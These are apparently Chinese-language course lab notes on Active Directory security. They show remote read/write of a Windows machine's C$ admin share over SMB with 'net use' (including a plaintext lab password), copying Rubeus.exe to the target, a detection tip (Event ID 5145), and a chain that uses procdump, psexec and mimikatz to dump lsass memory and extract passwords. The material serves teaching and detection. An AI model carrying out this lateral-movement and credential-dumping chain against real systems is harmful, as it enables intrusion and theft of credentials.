NTUSTISC - AD Note - Lab(SMB遠端讀寫)
[TOC]
Lecture Video: 2022/05/11 AD 安全 2
Lab
這個lab主要和之前不太一樣的地方在於都是利用SMB的功能達到遠端電腦讀寫的效果,雖然遠端執行也可以做到,但這樣會比較方便
==遠端讀寫(w/ GUI)==
- Open File Explorer
- Enter
\\<IP>\c$
For example:\\192.168.222.128\c$
- Login Local Admin
- Result
我在Win10中利用上述步驟,成功讀取到Win2016的資料
==遠端讀寫(w/o GUI)==
沒有GUI的情況就需要先掛載遠端的C槽在本地端,然後才可以進行後續的讀寫,有時候他會跳出錯誤
- Cheat Sheet
1
$ net use \<IP>\C$ "<password>" /user:<username>
:::spoiler Result
1
2
3
4
5
6
7
8
9
10
11
12
13$ net use \192.168.222.128\C$ "1qaz@WSX3edc" /user:administrator # 掛載遠端磁碟 命令已經成功完成。 $ net use # 查看已掛載的遠端磁碟 會記錄新的網路連線。 狀態 本機 遠端 網路 ------------------------------------------------------------------------------- OK \192.168.222.128\C$ Microsoft Windows Network 命令已經成功完成。 $ copy Rubeus.exe \192.168.222.128\C$ 複製了 1 個檔案。
可以看到Win2016的C槽中多了一個Rubeus.exe的檔案,代表成功 :::
==How to Detect SMB Access==
Event ID: 5145 預設不開,因為會有大量的event湧入,除非設定有存取c$的filter,就會少非常多,因為遠端存取c槽本身就蠻可疑的,所以偵測到非法存取的機率就蠻高的
==組合技==
- 利用SMB開進去遠端檔案總管,然後把procdump.exe送過去(忘記procdump.exe可以複習一下NTUSTISC - AD Note - Lab(其他方法得到lsass.dmp))
- 使用psexec.exe遠端執行procdump.exe就可以取得lsass的memory dump
- 再利用SMB把dump result取回本機
- 在本地端使用mimikatz以便取得更多密碼